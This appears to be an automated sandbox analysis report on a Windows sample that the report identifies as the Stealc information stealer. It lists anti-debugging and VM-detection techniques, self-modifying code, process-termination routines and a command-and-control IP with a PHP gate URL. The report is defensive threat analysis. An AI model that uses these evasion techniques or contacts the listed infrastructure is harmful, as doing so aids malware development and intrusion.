Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECD09 second address: CECD23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CBA1036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jne 00007FC41CBA1036h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECD23 second address: CECD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BAD5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECD3C second address: CECD5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1047h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECD5B second address: CECD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECD5F second address: CECD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECD63 second address: CECD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECD6E second address: CECD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CECD74 second address: CECD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF72FB second address: CF7329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CBA1046h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push esi 0x00000010 je 00007FC41CBA1036h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF7329 second address: CF732D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ADD4 second address: D0ADED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1043h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ADED second address: D0ADF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0ADF1 second address: D0AE24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FC41CBA1038h 0x0000000f jc 00007FC41CBA1038h 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007FC41CBA1047h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0AE24 second address: D0AE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1AABF second address: D1AAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41CBA1036h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FC41CBA1036h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1AAD2 second address: D1AADD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FC41D25BAC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1AADD second address: D1AAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC41CBA1041h 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC41CBA1036h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1AAFE second address: D1AB1D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D25BAC6h 0x00000008 jmp 00007FC41D25BACEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1AC80 second address: D1AC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1AC86 second address: D1AC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B0FF second address: D1B10C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC41CBA1038h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1CDF8 second address: D1CE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BACDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1CE0E second address: D1CE18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CBA1036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F7D8 second address: D1F7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FC41D25BAC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F97A second address: D1F993 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC41CBA1041h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F993 second address: D1F997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1FD24 second address: D1FD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1FD28 second address: D1FD2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20FC9 second address: D20FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0CF6E second address: C0CF78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D25BAC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D22785 second address: D227A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CBA1049h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D227A4 second address: D227E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FC41D25BADCh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FC41D25BAD2h 0x00000017 jg 00007FC41D25BAC6h 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D227E8 second address: D227F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007FC41CBA105Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D227F8 second address: D22802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC41D25BAC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5420507 second address: 5420524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1049h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5420524 second address: 542052A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 542052A second address: 542052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 542052E second address: 5420532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5420532 second address: 5420587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FC41CBA103Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007FC41CBA1047h 0x0000001b sbb ch, 0000000Eh 0x0000001e jmp 00007FC41CBA1049h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5420587 second address: 542058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 542058D second address: 5420591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54205AD second address: 54205B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54205B1 second address: 54205B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54205B7 second address: 5420610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D25BAD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC41D25BACCh 0x00000011 sbb al, 00000018h 0x00000014 jmp 00007FC41D25BACBh 0x00000019 popfd 0x0000001a mov edx, ecx 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007FC41D25BAD5h 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5420610 second address: 5420666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FC41CBA1046h 0x0000000b add ecx, 6DFF16D8h 0x00000011 jmp 00007FC41CBA103Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FC41CBA1046h 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC41CBA103Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5420666 second address: 542066A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 542066A second address: 5420670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A9DA66 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A9D98B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C5E763 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CC18A6 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found evaded block containing many API calls
Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_007C40F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_007BE530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007B1710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_007C47C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007BF7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007C4B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_007C3B00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_007BDB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_007BBE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_007BEE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007BDF10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B1160 GetSystemInfo,ExitProcess, 0_2_007B1160
Source: file.exe, file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareE
Source: file.exe, 00000000.00000002.1319415153.00000000016B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWQrU
Source: file.exe, 00000000.00000002.1319415153.00000000016B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B4610 VirtualProtect ?,00000004,00000100,00000000 0_2_007B4610
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_007C9BB0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9AA0 mov eax, dword ptr fs:[00000030h] 0_2_007C9AA0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_007C7690
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_007C9790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_007C98E0
Source: file.exe, file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007F75A8 cpuid 0_2_007F75A8
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_007C7D20
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_007C7B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_007C79E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_007C7BC0

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1546042 Sample: file.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 11 Suricata IDS alerts for network traffic 2->11 13 Found malware configuration 2->13 15 Antivirus / Scanner detection for submitted sample 2->15 17 8 other signatures 2->17 5 file.exe 13 2->5         started        process3 dnsIp4 9 185.215.113.206, 49702, 80 WHOLESALECONNECTIONSNL Portugal 5->9 19 Detected unpacking (changes PE section rights) 5->19 21 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->21 23 Tries to evade debugger and weak emulator (self modifying code) 5->23 25 6 other signatures 5->25 signatures5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/6c4adf523b719729.php true
    		unknown
    http://185.215.113.206/ true
      		unknown